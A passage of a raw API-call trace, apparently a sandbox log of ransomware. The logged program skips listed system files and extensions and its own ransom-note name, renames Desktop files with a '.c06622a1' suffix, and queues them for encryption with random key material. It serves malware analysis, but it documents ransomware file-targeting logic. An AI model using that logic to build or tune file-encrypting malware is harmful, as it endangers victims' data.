returned 4 [0156.043] wcslen (_String="themepack") returned 0x9 [0156.043] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0156.043] wcslen (_String="wpx") returned 0x3 [0156.043] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0156.043] wcslen (_String="lock") returned 0x4 [0156.043] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0156.043] wcslen (_String="key") returned 0x3 [0156.043] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0156.043] wcslen (_String="hta") returned 0x3 [0156.043] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0156.043] wcslen (_String="msi") returned 0x3 [0156.043] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0156.043] wcslen (_String="pdb") returned 0x3 [0156.044] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0156.044] wcslen (_String="sqlite") returned 0x6 [0156.044] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.044] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.044] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.044] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.044] wcscpy (in: _Dest=0x208e74, _Source="iTQ-yXGXHtYUFbxa.png" | out: _Dest="iTQ-yXGXHtYUFbxa.png") returned="iTQ-yXGXHtYUFbxa.png" [0156.044] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png", dwFileAttributes=0x80) returned 1 [0156.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itq-yxgxhtyufbxa.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0156.044] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.044] ReadFile (in: hFile=0x1a4, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.045] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xc1a2772c [0156.045] RtlComputeCrc32 (PartialCrc=0x772c, Buffer=0x32ec24, Length=0x80) returned 0x785cbc93 [0156.045] RtlComputeCrc32 (PartialCrc=0xbc93, Buffer=0x32ec24, Length=0x80) returned 0x4c47cd6c [0156.045] RtlComputeCrc32 (PartialCrc=0xcd6c, Buffer=0x32ec24, Length=0x80) returned 0x2be0cba6 [0156.045] RtlComputeCrc32 (PartialCrc=0xcba6, Buffer=0x32ec24, Length=0x80) returned 0xdb720aa5 [0156.045] CloseHandle (hObject=0x1a4) returned 1 [0156.045] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.045] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png" [0156.045] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png") returned 0x3e [0156.045] wcscpy (in: _Dest=0x218ea4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.045] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itq-yxgxhtyufbxa.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itq-yxgxhtyufbxa.png.c06622a1"), dwFlags=0x8) returned 1 [0156.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iTQ-yXGXHtYUFbxa.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itq-yxgxhtyufbxa.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0156.048] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.048] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2729395e [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x47b97979 [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4ca3f8ec [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x332f308f [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ef095e1 [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1dd35ba9 [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36ea3091 [0156.055] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7463b9b2 [0156.058] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xb268b84c [0156.058] RtlComputeCrc32 (PartialCrc=0xb84c, Buffer=0x2690094, Length=0x80) returned 0xeac16013 [0156.058] RtlComputeCrc32 (PartialCrc=0x6013, Buffer=0x2690094, Length=0x80) returned 0x17236904 [0156.058] RtlComputeCrc32 (PartialCrc=0x6904, Buffer=0x2690094, Length=0x80) returned 0x3f623592 [0156.058] RtlComputeCrc32 (PartialCrc=0x3592, Buffer=0x2690094, Length=0x80) returned 0x74a3f8a [0156.058] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.059] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.059] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.059] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdcc4570, ftCreationTime.dwHighDateTime=0x1d5dedc, ftLastAccessTime.dwLowDateTime=0x3b51a350, ftLastAccessTime.dwHighDateTime=0x1d5e509, ftLastWriteTime.dwLowDateTime=0x3b51a350, ftLastWriteTime.dwHighDateTime=0x1d5e509, nFileSizeHigh=0x0, nFileSizeLow=0xcc51, dwReserved0=0x0, dwReserved1=0x0, cFileName="jT36tI.avi", cAlternateFileName="")) returned 1 [0156.059] _wcsicmp (_Str1="jT36tI.avi", _Str2="README.c06622a1.TXT") returned -8 [0156.059] wcsstr (_Str="jT36tI.avi", _SubStr="README") returned 0x0 [0156.059] _wcsicmp (_Str1="autorun.inf", _Str2="jT36tI.avi") returned -9 [0156.059] wcslen (_String="autorun.inf") returned 0xb [0156.059] _wcsicmp (_Str1="boot.ini", _Str2="jT36tI.avi") returned -8 [0156.059] wcslen (_String="boot.ini") returned 0x8 [0156.059] _wcsicmp (_Str1="bootfont.bin", _Str2="jT36tI.avi") returned -8 [0156.059] wcslen (_String="bootfont.bin") returned 0xc [0156.059] _wcsicmp (_Str1="bootsect.bak", _Str2="jT36tI.avi") returned -8 [0156.059] wcslen (_String="bootsect.bak") returned 0xc [0156.059] _wcsicmp (_Str1="desktop.ini", _Str2="jT36tI.avi") returned -6 [0156.059] wcslen (_String="desktop.ini") returned 0xb [0156.059] _wcsicmp (_Str1="iconcache.db", _Str2="jT36tI.avi") returned -1 [0156.059] wcslen (_String="iconcache.db") returned 0xc [0156.059] _wcsicmp (_Str1="ntldr", _Str2="jT36tI.avi") returned 4 [0156.059] wcslen (_String="ntldr") returned 0x5 [0156.059] _wcsicmp (_Str1="ntuser.dat", _Str2="jT36tI.avi") returned 4 [0156.059] wcslen (_String="ntuser.dat") returned 0xa [0156.059] _wcsicmp (_Str1="ntuser.dat.log", _Str2="jT36tI.avi") returned 4 [0156.059] wcslen (_String="ntuser.dat.log") returned 0xe [0156.059] _wcsicmp (_Str1="ntuser.ini", _Str2="jT36tI.avi") returned 4 [0156.059] wcslen (_String="ntuser.ini") returned 0xa [0156.059] _wcsicmp (_Str1="thumbs.db", _Str2="jT36tI.avi") returned 10 [0156.059] wcslen (_String="thumbs.db") returned 0x9 [0156.059] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.059] wcslen (_String="386") returned 0x3 [0156.059] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.059] wcslen (_String="adv") returned 0x3 [0156.059] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.059] wcslen (_String="ani") returned 0x3 [0156.059] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.060] wcslen (_String="bat") returned 0x3 [0156.060] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.060] wcslen (_String="bin") returned 0x3 [0156.060] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.060] wcslen (_String="cab") returned 0x3 [0156.060] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.060] wcslen (_String="cmd") returned 0x3 [0156.060] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.060] wcslen (_String="com") returned 0x3 [0156.060] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.060] wcslen (_String="cpl") returned 0x3 [0156.060] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.060] wcslen (_String="cur") returned 0x3 [0156.060] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.060] wcslen (_String="deskthemepack") returned 0xd [0156.060] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.060] wcslen (_String="diagcab") returned 0x7 [0156.060] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.060] wcslen (_String="diagcfg") returned 0x7 [0156.060] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.060] wcslen (_String="diagpkg") returned 0x7 [0156.060] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.060] wcslen (_String="dll") returned 0x3 [0156.060] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.060] wcslen (_String="drv") returned 0x3 [0156.060] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.060] wcslen (_String="exe") returned 0x3 [0156.060] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.060] wcslen (_String="hlp") returned 0x3 [0156.060] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.060] wcslen (_String="icl") returned 0x3 [0156.060] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.060] wcslen (_String="icns") returned 0x4 [0156.060] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.060] wcslen (_String="ico") returned 0x3 [0156.060] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.060] wcslen (_String="ics") returned 0x3 [0156.061] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.061] wcslen (_String="idx") returned 0x3 [0156.061] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.061] wcslen (_String="ldf") returned 0x3 [0156.061] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.061] wcslen (_String="lnk") returned 0x3 [0156.061] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.061] wcslen (_String="mod") returned 0x3 [0156.061] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.061] wcslen (_String="mpa") returned 0x3 [0156.061] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.061] wcslen (_String="msc") returned 0x3 [0156.061] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.061] wcslen (_String="msp") returned 0x3 [0156.061] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.061] wcslen (_String="msstyles") returned 0x8 [0156.061] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.061] wcslen (_String="msu") returned 0x3 [0156.061] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.061] wcslen (_String="nls") returned 0x3 [0156.061] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.061] wcslen (_String="nomedia") returned 0x7 [0156.061] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.061] wcslen (_String="ocx") returned 0x3 [0156.061] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.061] wcslen (_String="prf") returned 0x3 [0156.061] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.061] wcslen (_String="ps1") returned 0x3 [0156.061] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.061] wcslen (_String="rom") returned 0x3 [0156.061] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.061] wcslen (_String="rtp") returned 0x3 [0156.061] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.061] wcslen (_String="scr") returned 0x3 [0156.061] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.061] wcslen (_String="shs") returned 0x3 [0156.061] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.061] wcslen (_String="spl") returned 0x3 [0156.062] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.062] wcslen (_String="sys") returned 0x3 [0156.062] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.062] wcslen (_String="theme") returned 0x5 [0156.062] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.062] wcslen (_String="themepack") returned 0x9 [0156.062] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.062] wcslen (_String="wpx") returned 0x3 [0156.062] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.062] wcslen (_String="lock") returned 0x4 [0156.062] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.062] wcslen (_String="key") returned 0x3 [0156.062] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.062] wcslen (_String="hta") returned 0x3 [0156.062] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.062] wcslen (_String="msi") returned 0x3 [0156.062] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.062] wcslen (_String="pdb") returned 0x3 [0156.062] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.062] wcslen (_String="sqlite") returned 0x6 [0156.062] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.062] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.062] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.062] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.062] wcscpy (in: _Dest=0x208e74, _Source="jT36tI.avi" | out: _Dest="jT36tI.avi") returned="jT36tI.avi" [0156.062] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi", dwFileAttributes=0x80) returned 1 [0156.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jt36ti.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0156.063] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.063] ReadFile (in: hFile=0x1ac, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.064] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x8b97939 [0156.064] RtlComputeCrc32 (PartialCrc=0x7939, Buffer=0x32ec24, Length=0x80) returned 0xcfd450eb [0156.064] RtlComputeCrc32 (PartialCrc=0x50eb, Buffer=0x32ec24, Length=0x80) returned 0x159d4b45 [0156.064] RtlComputeCrc32 (PartialCrc=0x4b45, Buffer=0x32ec24, Length=0x80) returned 0x97c60b5 [0156.064] RtlComputeCrc32 (PartialCrc=0x60b5, Buffer=0x32ec24, Length=0x80) returned 0xdb59f453 [0156.064] CloseHandle (hObject=0x1ac) returned 1 [0156.064] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.064] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi" [0156.064] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi") returned 0x34 [0156.064] wcscpy (in: _Dest=0x218e90, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.064] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jt36ti.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jt36ti.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jT36tI.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jt36ti.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0156.066] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.066] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4fea1558 [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x49ed021f [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d16e772 [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x246dd466 [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4abd0582 [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x531575e4 [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa24741e [0156.073] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b7b15f8 [0156.076] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x127209a0 [0156.076] RtlComputeCrc32 (PartialCrc=0x9a0, Buffer=0x2b70094, Length=0x80) returned 0x3d5d05d2 [0156.076] RtlComputeCrc32 (PartialCrc=0x5d2, Buffer=0x2b70094, Length=0x80) returned 0x85a35e6 [0156.076] RtlComputeCrc32 (PartialCrc=0x35e6, Buffer=0x2b70094, Length=0x80) returned 0x3a4f2b46 [0156.076] RtlComputeCrc32 (PartialCrc=0x2b46, Buffer=0x2b70094, Length=0x80) returned 0xf610afe8 [0156.077] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.077] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.077] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.077] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf875340, ftCreationTime.dwHighDateTime=0x1d5e30b, ftLastAccessTime.dwLowDateTime=0x790a7a50, ftLastAccessTime.dwHighDateTime=0x1d5dd11, ftLastWriteTime.dwLowDateTime=0x790a7a50, ftLastWriteTime.dwHighDateTime=0x1d5dd11, nFileSizeHigh=0x0, nFileSizeLow=0x1188a, dwReserved0=0x0, dwReserved1=0x0, cFileName="K2QW6o1V4zrGcZk.wav", cAlternateFileName="K2QW6O~1.WAV")) returned 1 [0156.077] _wcsicmp (_Str1="K2QW6o1V4zrGcZk.wav", _Str2="README.c06622a1.TXT") returned -7 [0156.077] wcsstr (_Str="K2QW6o1V4zrGcZk.wav", _SubStr="README") returned 0x0 [0156.077] _wcsicmp (_Str1="autorun.inf", _Str2="K2QW6o1V4zrGcZk.wav") returned -10 [0156.077] wcslen (_String="autorun.inf") returned 0xb [0156.077] _wcsicmp (_Str1="boot.ini", _Str2="K2QW6o1V4zrGcZk.wav") returned -9 [0156.077] wcslen (_String="boot.ini") returned 0x8 [0156.077] _wcsicmp (_Str1="bootfont.bin", _Str2="K2QW6o1V4zrGcZk.wav") returned -9 [0156.077] wcslen (_String="bootfont.bin") returned 0xc [0156.077] _wcsicmp (_Str1="bootsect.bak", _Str2="K2QW6o1V4zrGcZk.wav") returned -9 [0156.077] wcslen (_String="bootsect.bak") returned 0xc [0156.077] _wcsicmp (_Str1="desktop.ini", _Str2="K2QW6o1V4zrGcZk.wav") returned -7 [0156.077] wcslen (_String="desktop.ini") returned 0xb [0156.077] _wcsicmp (_Str1="iconcache.db", _Str2="K2QW6o1V4zrGcZk.wav") returned -2 [0156.077] wcslen (_String="iconcache.db") returned 0xc [0156.077] _wcsicmp (_Str1="ntldr", _Str2="K2QW6o1V4zrGcZk.wav") returned 3 [0156.077] wcslen (_String="ntldr") returned 0x5 [0156.077] _wcsicmp (_Str1="ntuser.dat", _Str2="K2QW6o1V4zrGcZk.wav") returned 3 [0156.077] wcslen (_String="ntuser.dat") returned 0xa [0156.077] _wcsicmp (_Str1="ntuser.dat.log", _Str2="K2QW6o1V4zrGcZk.wav") returned 3 [0156.077] wcslen (_String="ntuser.dat.log") returned 0xe [0156.077] _wcsicmp (_Str1="ntuser.ini", _Str2="K2QW6o1V4zrGcZk.wav") returned 3 [0156.077] wcslen (_String="ntuser.ini") returned 0xa [0156.077] _wcsicmp (_Str1="thumbs.db", _Str2="K2QW6o1V4zrGcZk.wav") returned 9 [0156.077] wcslen (_String="thumbs.db") returned 0x9 [0156.077] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0156.077] wcslen (_String="386") returned 0x3 [0156.077] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0156.078] wcslen (_String="adv") returned 0x3 [0156.078] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0156.078] wcslen (_String="ani") returned 0x3 [0156.078] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0156.078] wcslen (_String="bat") returned 0x3 [0156.078] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0156.078] wcslen (_String="bin") returned 0x3 [0156.078] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0156.078] wcslen (_String="cab") returned 0x3 [0156.078] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0156.078] wcslen (_String="cmd") returned 0x3 [0156.078] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0156.078] wcslen (_String="com") returned 0x3 [0156.078] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0156.078] wcslen (_String="cpl") returned 0x3 [0156.078] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0156.078] wcslen (_String="cur") returned 0x3 [0156.078] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0156.078] wcslen (_String="deskthemepack") returned 0xd [0156.078] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0156.078] wcslen (_String="diagcab") returned 0x7 [0156.078] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0156.078] wcslen (_String="diagcfg") returned 0x7 [0156.078] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0156.078] wcslen (_String="diagpkg") returned 0x7 [0156.078] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0156.078] wcslen (_String="dll") returned 0x3 [0156.078] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0156.078] wcslen (_String="drv") returned 0x3 [0156.078] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0156.078] wcslen (_String="exe") returned 0x3 [0156.078] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0156.078] wcslen (_String="hlp") returned 0x3 [0156.078] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0156.078] wcslen (_String="icl") returned 0x3 [0156.078] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0156.078] wcslen (_String="icns") returned 0x4 [0156.079] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0156.079] wcslen (_String="ico") returned 0x3 [0156.079] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0156.079] wcslen (_String="ics") returned 0x3 [0156.079] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0156.079] wcslen (_String="idx") returned 0x3 [0156.079] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0156.079] wcslen (_String="ldf") returned 0x3 [0156.079] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0156.079] wcslen (_String="lnk") returned 0x3 [0156.079] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0156.079] wcslen (_String="mod") returned 0x3 [0156.079] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0156.079] wcslen (_String="mpa") returned 0x3 [0156.079] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0156.079] wcslen (_String="msc") returned 0x3 [0156.079] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0156.079] wcslen (_String="msp") returned 0x3 [0156.079] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0156.079] wcslen (_String="msstyles") returned 0x8 [0156.079] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0156.079] wcslen (_String="msu") returned 0x3 [0156.079] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0156.079] wcslen (_String="nls") returned 0x3 [0156.079] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0156.079] wcslen (_String="nomedia") returned 0x7 [0156.079] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0156.079] wcslen (_String="ocx") returned 0x3 [0156.079] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0156.079] wcslen (_String="prf") returned 0x3 [0156.079] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0156.079] wcslen (_String="ps1") returned 0x3 [0156.079] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0156.079] wcslen (_String="rom") returned 0x3 [0156.079] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0156.079] wcslen (_String="rtp") returned 0x3 [0156.080] _wcsicmp 